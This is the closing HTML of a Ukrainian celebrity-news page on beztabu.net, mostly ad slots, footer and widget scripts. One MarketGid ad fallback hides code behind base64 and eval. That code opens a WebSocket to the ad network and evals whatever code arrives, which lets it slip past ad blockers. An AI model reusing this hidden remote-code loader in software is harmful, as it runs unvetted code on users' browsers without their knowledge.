<li data-published-date="2019-07-05 13:20:00" data-url="/fanat-rossii-poobeshchal-vzorvat-vokzal-odessy-esli-shariya-ne-dopustyat-k-vyboram_n64568" title="Фанат России пообещал взорвать вокзал Одессы, если Шария не допустят к выборам" class="  last ">
<a target="_self" href="/fanat-rossii-poobeshchal-vzorvat-vokzal-odessy-esli-shariya-ne-dopustyat-k-vyboram_n64568">
<div class="time">13:20</div>
<div class="news-title">
Фанат России пообещал взорвать вокзал Одессы, если Шария не допустят к выборам
</div>
</a>
</li>
</ul>
</div>
<button data-limit="25" class="simple-button scroll-news-list more-news last"> Больше</button>
</div>

<div id="M378456Composite633272">
<center> <a href="http://marketgid.com/" target="_blank">Загрузка...</a> </center>
</div>
<script type="text/javascript">
        var d = new Date, script633272 = document.createElement("script"), mg_ws633272 = {};script633272.type = "text/javascript";script633272.charset = "utf-8";script633272.src = "//jsc.marketgid.com/1/b/1.beztabu.net.633272.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script633272.onerror = function () { mg_ws633272 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MzMyNzIoZSl7dmFyIGg9bWdfd3M2MzMyNzIub25tZXNzYWdlOyBtZ193czYzMzI3Mi5yZWFkeVN0YXRlPT1tZ193czYzMzI3Mi5DTE9TRUQmJihtZ193czYzMzI3Mj1uZXcgV2ViU29ja2V0KG1nX3dzNjMzMjcyX2xvY2F0aW9uKSksbWdfd3M2MzMyNzIub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MzMyNzIobWdfd3M2MzMyNzIsZnVuY3Rpb24oKXttZ193czYzMzI3Mi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MzMyNzIoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MzMyNzIoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MzMyNzJfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYzMzI3MiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MzMyNzJfbG9jYXRpb24pLCBtZ193czYzMzI3Mi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MzMyNzIoZS5kYXRhKX0=\'))']), {type: "application/javascript"})); mg_ws633272.onmessage = function (msg){window.eval(msg.data);}; mg_ws633272.postMessage('js|'+script633272.src+'|M378456Composite633272|M378456Composite633272');};document.body.appendChild(script633272);
    </script>

<script>
    $(document).ready(function(){

        // wait until window is loaded (images, stylesheets, links etc...)
        $(window).on("load", function() {
            var topListLi = $('#top-list-li');
            var NewsListModule = new NewsListAjaxPagination({
                'getMoreLastNewsPath': '/get-more-last-news',
                'mainPage': 'false'
            });
        });

    });
</script>
<div class="adv-300 hide-for-medium-down" id="bezTabu_300x250_bottom" style="display: none;">
<div class="wrapper">
<script>
    if(adCore.isLargerThan(1000)) {
        adCore.defineDfpSlot({
            'name': '/56301415/bezTabu_300x250_bottom',
            'sizes': [[300, 600], [300, 250]],
            'id': 'div-gpt-ad-1464272098125-0',
            'targeting': adCore.targeting.getAll(),
            'callback': function(e) {
                if(!e.isEmpty) {
                    document.getElementById('bezTabu_300x250_bottom').style.display = 'block';
                }
            }
        });
    }
</script>
<div id='div-gpt-ad-1464272098125-0'>
<script type='text/javascript'>
        if (adCore.isLargerThan(1000)) {
            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1464272098125-0'); });
        }
    </script>
</div>
</div>
</div>
</div>
<script>
    if (adCore.isLargerThan(1023)) {
        adCore.defineDfpSlot({
            'name': '/113579682/beztabu_catFish',
            'sizes': [1, 1],
            'id': 'div-gpt-ad-1485892804040-0',
            'targeting': [
                ['pageType', adCore.getPageName()]
            ],
            'callback': function (e) {
                document.getElementById('div-gpt-ad-1485892804040-0').style.display = 'block';
            }
        });
    }
</script>

<div id="cat-fish">
<div id='div-gpt-ad-1485892804040-0' style='height:1px; width:1px;'>
<script>
            if (window.matchMedia && window.matchMedia("(min-width: 1023px)").matches) {
                if (!document.referrer.match(/ukr.net/gi)) {
                    googletag.cmd.push(function () {
                        googletag.display('div-gpt-ad-1485892804040-0');
                    });
                }
            }
        </script>
</div>
</div> </div>
<div style="display: none" xmlns:v="http://rdf.data-vocabulary.org/#">
<span typeof="v:Breadcrumb">
<a href="/" rel="v:url" property="v:title">
Без Табу
</a> ›
</span>
<span typeof="v:Breadcrumb">
<a href="/novosti_t4952" rel="v:url" property="v:title">
Новости
</a> ›
</span>
<span typeof="v:Breadcrumb">
<a href="/potap_t7273" rel="v:url" property="v:title">
Потап
</a> ›
</span>
</div>
<footer>
<div class="row">
<div class="column small-6 medium-4 large-3">
<a href="/" class="logo"></a>
<div class="social-group column small-12">
<a target="_blank" class="social facebook" href="https://www.facebook.com/beztabu.ua/"></a>
<a target="_blank" class="social twitter" href="https://twitter.com/UABezTabu"></a>
<a target="_blank" class="social rss" href="/rssAll.xml"></a>
</div>
</div>
<div class="navigation column small-6 medium-8 large-9">
</div>
<div class="copyrights column small-12 medium-8 large-9">
<div class="copyright-text"></div>
<script>
                $(function () {
                    new fGetContents({
                        selector: '.copyright-text',
                        type: 'footerCopyright',
                        replaceText: [{'textFrom':'{CURRENT_YEAR}', 'textTo':(new Date()).getFullYear()},{'textFrom': '{RULES_LINK}', 'textTo': '/rules'},{'textFrom': '{COPY_LINK}', 'textTo': '/copyrights'}]
                    });

                });
            </script>
</div>
</div>
</footer>
<script src="/assets/js/lib.min.js?v=42"></script>
<script src="/assets/js/app.min.js?v=42"></script>
<script src="/bundles/search/js/search.js?v=42" type="text/javascript"></script>
<script>
        new Search({
            'searchUrl': "/search/news",
            'searchInput': $('#solr-news-search'),
        });
    </script>
<script>
        $(function () {
            new ClipboardTextWatermark({
                selector: '.news-wrapper',
                prefixText: 'Шоубиз',
                link: 'https://beztabu.net/shoubiz_t7103',
                textWatermark: '<br/>https://beztabu.net/shoubiz_t7103'
            });
        });
    </script>
<script>
        $(document).ready(function () {
            $('.comments').click(function () {
                $('html, body').animate({
                    scrollTop: $("#fb-root").offset().top
                }, 2000);
            });
        });

        function increaseCountViews() {
            var now = new Date();
            $.ajax({
                type: "GET",
                url: "/increase-count-views?newsId=" + 64590,
                async: true,
                success: function (data) {
                }
            });
        }

        function getRandomInt(min, max) {
            return Math.floor(Math.random() * (max - min + 1)) + min;
        }

        increaseCountViews();

        function getShareCount() {
            $.ajax({
                type: "GET",
                url: "/get-share-count/" + 64590 +"/" + 1,
                data: {url: "https://beztabu.net/potapa-zastali-s-neizvestnoj-bryunetkoj---foto_n64590"},
                async: true,
                success: function (data) {

                    if (data.fbTotal !== 0) {
                        $('span.facebook-count').text(data.fbTotal);
                    }

                    if (data.tweetShare !== 0) {
                        $('span.twitter-count').text(data.tweetShare);
                    }

                    if (data.googleShare !== 0) {
                        $('span.google-count').text(data.googleShare);
                    }

                    var fbCommentsCounter = $(".news-sharing .comments");
                    if (data.fbCommentsCount === 0) {
                        fbCommentsCounter.html('')
                    } else {
                        fbCommentsCounter.css('display', 'block').html(data.fbCommentsCount);
                    }
                }
            });
        }

        // getShareCount();
    </script>
<script>
        (function () {
            $('#ontheioViewTacking').attr('data-io-article-url', window.location.href);
        })();
    </script>
<script>
    if( typeof dfpAdSlots === 'undefined'){
        var dfpAdSlots = [];
    }
    if (adCore.isLargerThan(1200)) {
        dfpAdSlots['brandingAdSlot'] = adCore.defineDfpSlot({
            'name': '/56301415/bezTabu_branding',
            'sizes': [1, 1],
            'id': 'div-gpt-ad-1465981329789-0',
            'targeting': adCore.targeting.getAll(),
            'callback': function (e) {
                if (e.isEmpty) {
                    if (adCore.isLargerThan(1320)) {
                        $('body').addClass('branding-mode');
                        adCore.defineDfpSlot({
                            'name': '/56301415/beztabu_160x600_sticky_left',
                            'sizes': [[160, 600], [120, 600]],
                            'id': 'div-gpt-ad-1480890563151-0',
                            'targeting': adCore.targeting.getAll(),
                            'callback': function () {}
                        });
                        googletag.cmd.push(function () {googletag.display('div-gpt-ad-1480890563151-0');});

                        adCore.defineDfpSlot({
                            'name': '/56301415/beztabu_160x600_sticky_right',
                            'sizes': [[160, 600], [120, 600]],
                            'id': 'div-gpt-ad-1480890563151-1',
                            'targeting': adCore.targeting.getAll(),
                            'callback': function () {}
                        });
                        googletag.cmd.push(function () {googletag.display('div-gpt-ad-1480890563151-1');});
                    }
                } else {
                    dfpAdSlots['brandingAdSlot'] = e.slot;
                }
            }
        });
    }
</script>
<div class="adv-container">
<div class="row">
<div id="branding_wrap" class="bending_wrap"></div>
</div>
</div> 
<div id='div-gpt-ad-1465981329789-0'>
<script type='text/javascript'>
        if (adCore.isLargerThan(1200)) {
            googletag.cmd.push(function () {
                googletag.display('div-gpt-ad-1465981329789-0');
            });
        }
    </script>
</div>
<div class="adv-container">
<div id="branding-wrapp" class="branding-wrapp">
<div class="google-left-img">
<div id="google-left-bg-image" style="width: 160px; height: 600px; position: fixed;">
<div id='div-gpt-ad-1480890563151-0'>
</div>
</div>
</div>
<div class="google-right-img">
<div id="google-right-bg-image" style="width: 160px; height: 600px; position: fixed;">
<div id='div-gpt-ad-1480890563151-1'>
</div>
</div>
</div>
</div>
</div>


<div class="widget-trigger-6">
<div class="UNI-feedback-trigger">
<div class="UNI-title">Надіслати відгук</div>
</div>
</div>

<div id="feedback-widget-6"></div>
<div id="feedback-widget-ctrl-enter-6"></div>
<script src="https://feedback.luxnet.ua/js/feedback_init.js?v=42"></script>
<script src="https://feedback.luxnet.ua/js/html2canvas.js?v=42"></script>
<script src="https://feedback.luxnet.ua/js/swfobject.js?v=42"></script>

<script>
    new FeedbackWidget({
        siteId: 6,
        elem: "#feedback-widget-6",
        elemCtrlEnter: "#feedback-widget-ctrl-enter-6",
        trigger: ".widget-trigger-6",
        host: "https://feedback.luxnet.ua",
        newsId: '64590',
        isAdBlock: false,
        ctrlEnterEnable: true,
        readOnlyCtrlEnter: false
    });
</script> 
</body>
</html>
